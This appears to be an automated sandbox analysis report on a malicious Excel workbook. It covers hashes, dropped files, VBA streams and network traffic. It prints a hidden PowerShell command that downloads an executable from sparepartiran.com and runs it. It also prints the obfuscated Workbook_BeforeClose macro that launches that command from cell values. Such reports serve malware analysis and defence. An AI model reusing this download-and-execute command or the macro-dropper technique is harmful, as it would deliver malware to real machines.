                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe
                                              Process:C:\Users\Public\oftmhayq.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):552960
                                              Entropy (8bit):7.182147023805618
                                              Encrypted:false
                                              SSDEEP:12288:MiUO3Iy0AZNVNpiWbYOoa09FQFFFFFFFFFFFFFFFFFFFFFRYH8txxxxxxxxxxxxZ:InULziIYpaIFq
                                              MD5:7E26E87AB642008D934824D509559859
                                              SHA1:3D4DC73FEE1B191C2B942E28920C37C82D38B0ED
                                              SHA-256:3176528C561817095AF859F4809A2091F8557F93C27A0FE32EE71C8FC3B71F33
                                              SHA-512:C51D64487F852B3D24C4F6B6C2EB79DEAC9394A607BE1B8287BD087398B17B5403DDACE34EB46FD0A5807E044ECC6869213CCEF9EEDA4604D7A1DF711B691A2C
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......_.................P..........No... ........@.. ....................................@..................................n..W.................................................................................... ............... ..H............text...TO... ...P.................. ..`.rsrc................R..............@..@.reloc...............n..............@..B................0o......H........J..h$...........0...............................................0.............-.&(....+.&+.*....0..3........(......-.&..-.&..-.&.(....+.(....+.(....+.(....+.*..0.......... .....-.&s.....-.&sX....-.&.o....+..+..+...+..(.....o.....j2...+...(....r...p..H...........(......(.......*........o[.....o....t+...}....*...0.. .........{....r...po.....-.&&+.}....+.*.0..u........{....(.....-.&~....-I+..+. ....r_..p......(...........-.&....(......(....( ....-.&+..+.....+.~....{!..
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.0kLC5vT1.20201127113806.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):3951
                                              Entropy (8bit):5.421598276555511
                                              Encrypted:false
                                              SSDEEP:96:BZIh5N9I1qDo1ZrSieXmZah5N9I1qDo1ZIseX2eXSrEzyeXSrEzyeXSrEzTZ7:leXgeX2eX8eX8eXn
                                              MD5:5157FE1088C77BC92F20BF23DB040ACB
                                              SHA1:108D7C64C82A178B2E12F50983FC746C8C008621
                                              SHA-256:DE128F5C758AE0CDE62A7074EBBBECFE96BACA2D30503A2CF49B54CD6D026309
                                              SHA-512:91BD8AC33B8459D11CDBB63EA7F4083395EE152671CA459B58560D2AE4ABDA4D4AC8752D64EDB05FC05F69C9F36153B5DCB0AEDC2A87ECEF04F615C3028F40C8
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5184..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.
                                              C:\Users\user\Documents\20201127\PowerShell_transcript.849224.b3BihSD7.20201127113805.txt
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1219
                                              Entropy (8bit):5.282450136999881
                                              Encrypted:false
                                              SSDEEP:24:BxSAsxvBn5x2DOXiRbWoPuv18WMHjeTKKjX4CIym1ZJXQaPuv1WnxSAZI:BZwvh5oOqioPuv1HMqDYB1ZLPuv14ZZI
                                              MD5:09AC619D5065DA9F92352D74207C3020
                                              SHA1:FAF52D46822C6571C60E32E0C79D1D6947BCA100
                                              SHA-256:7567B37EB56FECE10EC3C5924D2EF4576ABF88080D9C09439B44104FBB182E5B
                                              SHA-512:FB281DD2CA0977C9B659171CE9DC89A957F098AF7D3A8537A1C54D30F94448609C2319D9BE6A1FEA042417CE15CA0FE4D3E286C1FC0CF0CC9FAAFEF41F95E54E
                                              Malicious:false
                                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20201127113806..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 849224 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.exe}..Process ID: 5164..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201127113806..**********************..PS> & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath C:\Users\Public\oftmhayq.

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dell, Last Saved By: Dell, Create Time/Date: Fri Nov 27 09:06:11 2020, Last Saved Time/Date: Fri Nov 27 09:06:12 2020, Security: 0
                                              Entropy (8bit):7.862065005946057
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:5901777.xls
                                              File size:208384
                                              MD5:899e5af08f0794f0131adbf03f841045
                                              SHA1:242508434986d472b0b83387ec8d5d33888baa29
                                              SHA256:74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
                                              SHA512:e43293d7d37a19a7564e076fdb55ea9594758246504cbd504653f8b3c60a94806313145c13366f21bcc85b98c407262f63bfdb25511738899fcef4cb4cf665a2
                                              SSDEEP:6144:gk3hOdsylKlgryzc4bNhZF+E+W2knu17K4g62FpqDIWPIVirJNl15bdVwHmGRl:61+4v2FpqDAcrJN1bbwGGR
                                              File Content Preview:........................>.......................................................b.......d......................................................................................................................................................................

                                              File Icon

                                              Icon Hash:74ecd4c6c3c6c4d8

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "5901777.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Author:Dell
                                              Last Saved By:Dell
                                              Create Time:2020-11-27 09:06:11
                                              Last Saved Time:2020-11-27 09:06:12
                                              Security:0

                                              Document Summary

                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:983040

                                              Streams with VBA

                                              VBA File Name: ThisWorkbook.cls, Stream Size: 742
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                              VBA File Name:ThisWorkbook.cls
                                              Stream Size:742
                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " T h i . s W o r k b o o . k " . . . . B a s . . . 0 { 0 0 0 2 0 P 8 1 9 - . . 0 . . C # . . . . 4 6 } . | G l . o b a l . . S p a . c . . F a l s e . % . C r e a t a b l . . . P r e d e c l . a . . I d . # T r u . . " E x p o s e . . . . @ T e m p l a t @ e D e r i v . . C . u s t o m i z . D . . 2 P . . . . S u b . . . _ B e f o r . e C l . 9 ( C a n . c e l A s B . o o l e a n ) . . . R a n g e ( " . l 1 : x 2 2 " ) . . S e l e c t . . . . . i
                                              Data Raw:01 e2 b2 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 57 6f 72 6b 62 6f 6f 10 6b 22 0d 0a 0a 8c 42 61 73 01 02 8c 30 7b 30 30 30 32 30 50 38 31 39 2d 00 10 30 03 08 43 23 05 12 03 00 34 36 7d 0d 7c 47 6c 10 6f 62 61 6c 01 d0 53 70 61 82 63 01 92 46 61 6c 73 65 0c 25 00 43 72 65 61 74 61 62 6c 01 15 1f 50 72 65 64 65 63 6c 12 61 00 06 49 64

                                              VBA Code Keywords

                                              Keyword
                                              .ShrinkToFit
                                              .TintAndShade
                                              lctheufps
                                              VB_Name
                                              VB_Creatable
                                              xlCenter
                                              lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
                                              "ThisWorkbook"
                                              VB_Exposed
                                              .VerticalAlignment
                                              .WrapText
                                              .Orientation
                                              Selection.Borders(xlDiagonalUp).LineStyle
                                              .MergeCells
                                              xlThin
                                              psisbdmpm
                                              Workbook_BeforeClose(Cancel
                                              VB_Customizable
                                              .ColorIndex
                                              .AddIndent
                                              Selection.Font.Italic
                                              .Weight
                                              Selection.Font.Bold
                                              xlContext
                                              yqukhazhshmodqbmnkwuescdsportzmbady
                                              .HorizontalAlignment
                                              xlBottom
                                              .LineStyle
                                              VB_TemplateDerived
                                              xlNone
                                              xlUnderlineStyleSingle
                                              Selection.Borders(xlDiagonalDown).LineStyle
                                              Selection.Borders(xlEdgeTop)
                                              Selection
                                              False
                                              Selection.Borders(xlEdgeLeft)
                                              .IndentLevel
                                              Attribute
                                              Selection.Font.Underline
                                              Private
                                              .ReadingOrder
                                              xlContinuous
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              Boolean)
                                              VBA Code
                                              Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
Range("l1:x22").Select
Selection.Borders(xlDiagonalDown).LineStyle = xlNone
Selection.Borders(xlDiagonalUp).LineStyle = xlNone
With Selection.Borders(xlEdgeLeft)
.LineStyle = xlContinuous
.ColorIndex = 0
.TintAndShade = 0
.Weight = xlThin
End With
Range("A1:J15").Select
Selection.Font.Bold = True
Selection.Font.Italic = True
Selection.Font.Underline = xlUnderlineStyleSingle
yqukhazhshmodqbmnkwuescdsportzmbady = Range("A3").Value
With Selection
.HorizontalAlignment = xlCenter
.VerticalAlignment = xlBottom
.WrapText = False
.Orientation = 0
.AddIndent = False
.IndentLevel = 0
.ShrinkToFit = False
.ReadingOrder = xlContext
.MergeCells = False
End With
Set lctheufps  = CreateObject(Range("A4").Value)
Dim psisbdmpm
Range("M5").Select
psisbdmpm = lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
With Selection.Borders(xlEdgeTop)
.LineStyle = xlContinuous
.ColorIndex = 0
psisbdmpm = lctheufps.Create(yqukhazhshmodqbmnkwuescdsportzmbady)
.TintAndShade = 0
.Weight = xlThin
End With
End sub
                                              VBA File Name: oldgcaiba.cls, Stream Size: 172
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/oldgcaiba
                                              VBA File Name:oldgcaiba.cls
                                              Stream Size:172
                                              Data ASCII:. . . . A t t r i b u t . e V B _ N a m . e = " o l d . g c a i b a " . " . . . B a s . . 0 { . 0 0 0 2 0 8 2 0 6 - . . . . C . . . . 4 6 . } . | G l o b a l ! . . S p a c . . F a . l s e . % C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . . @ T e m . p l a t e D e r . i v . . C u s t o . m i z . D . 2
                                              Data Raw:01 a8 b0 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 6f 6c 64 00 67 63 61 69 62 61 22 0d 22 0a 0a 80 42 61 73 02 80 30 7b 00 30 30 30 32 30 38 32 30 36 2d 00 10 04 08 43 05 12 03 00 34 36 02 7d 0d 7c 47 6c 6f 62 61 6c 21 01 ca 53 70 61 63 01 92 46 61 08 6c 73 65 0c 25 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72

                                              VBA Code Keywords

                                              Keyword
                                              "oldgcaiba"
                                              False
                                              VB_Exposed
                                              Attribute
                                              VB_Name
                                              VB_Creatable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_Customizable
                                              VB_TemplateDerived
                                              VBA Code
                                              Attribute VB_Name = "oldgcaiba"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 107
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:107
                                              Entropy:4.18482950044
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                              Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 1f 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 228
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:228
                                              Entropy:2.83826051843
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . o l d g c a i b a . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8e 00 00 00 02 00 00 00 e4 04 00 00
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 176
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:176
                                              Entropy:3.03638398782
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . P . . . . . . . ` . . . . . . . l . . . . . . . x . . . . . . . . . . . . . . . . . . . D e l l . . . . . . . . . . . . D e l l . . . . @ . . . . . . . . . . . @ . . . . . b . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 80 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 50 00 00 00 0c 00 00 00 60 00 00 00 0d 00 00 00 6c 00 00 00 13 00 00 00 78 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00
                                              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 200639
                                              General
                                              Stream Path:Workbook
                                              File Type:Applesoft BASIC program data, first line number 16
                                              Stream Size:200639
                                              Entropy:7.92744162749
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P K . 8 . . . . . . . X . @
                                              Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c1 c0 01 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 478
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                              File Type:ASCII text, with CRLF line terminators
                                              Stream Size:478
                                              Entropy:5.17133809761
                                              Base64 Encoded:True
                                              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = o l d g c a i b a / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = 0 . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 6 9 4 3 A D 6 4 6 F A D 8 F E D 8 F E D C 0 2 D C 0 2 " . . D P B = " D 1 D 3 7 D 6 2 9 A 6 2 9 A 9 D 6 6 6 3 9 A 4 2 4 0 E 8 2 B D 8 8 8 E D
                                              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6f 6c 64 67 63 61 69 62 61 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 71
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              File Type:data
                                              Stream Size:71
                                              Entropy:3.1232478398
                                              Base64 Encoded:False
                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . o l d g c a i b a . o . l . d . g . c . a . i . b . a . . . . .
                                              Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 6f 6c 64 67 63 61 69 62 61 00 6f 00 6c 00 64 00 67 00 63 00 61 00 69 00 62 00 61 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: ISO-8859 text, with no line terminators, Stream Size: 7
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              File Type:ISO-8859 text, with no line terminators
                                              Stream Size:7
                                              Entropy:1.84237099318
                                              Base64 Encoded:False
                                              Data ASCII:. a . . . . .
                                              Data Raw:cc 61 ff ff 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 224
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              File Type:data
                                              Stream Size:224
                                              Entropy:5.5463550152
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . 0 . . . . . . . . H . . . . . . . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . Q . T . . . " < . . . . . . D . . . . . . . . . T . h i s W o r k b @ o o k G . . . . . . h . i . s . W . . o . r . k . b . . . o . . . . / 2 . / . . u . H . . 1 . . . . . , . C * " . . + . . . . ^ . . . o l d g c a i b . a G . . . . . l . . d . g . c . a . 4 j b . . . . . 2 . . . @ . . . .
                                              Data Raw:01 dc b0 80 01 00 04 00 00 00 01 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 00 08 05 06 12 09 02 12 a5 95 1f 51 06 54 00 0c 02 22 3c 02 0a 0f 02 b6 02 44 00 13 02 07 ff ff 19 02 1d 54 00 68 69 73 57 6f 72 6b 62 40 6f 6f 6b 47 00 18 01 11 00 00 68 00 69 00 73

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 27, 2020 11:38:08.703929901 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.777448893 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.824160099 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.824331045 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.837831020 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.895749092 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.896704912 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.898339987 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.956010103 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.958857059 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.958878994 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.958959103 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.959620953 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959639072 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959748030 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.959760904 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959779978 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959791899 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959805012 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959908009 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:08.959959030 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.959990978 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:08.960108042 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.016362906 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019684076 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019738913 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019777060 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019817114 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019829988 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.019855976 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019896030 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.019921064 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.020001888 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.020236015 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.020278931 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.020317078 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.020349979 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.020354986 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.021069050 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.064140081 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.079015970 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079062939 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079102993 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079142094 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.079160929 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.079231977 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.081520081 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081563950 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081604004 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081624985 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.081645966 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.081757069 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084659100 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084716082 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084754944 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084791899 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084820032 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084831953 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084836006 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084872007 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084919930 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.084923029 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.084963083 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.085015059 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.087742090 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087779045 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087816954 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.087855101 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.087865114 CET8049743162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.088689089 CET4974380192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137701035 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137737989 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137759924 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137780905 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137788057 CET4974480192.168.2.3162.223.88.131
                                              Nov 27, 2020 11:38:09.137809038 CET8049744162.223.88.131192.168.2.3
                                              Nov 27, 2020 11:38:09.137818098 CET4974480192.168.2.3162.223.88.131
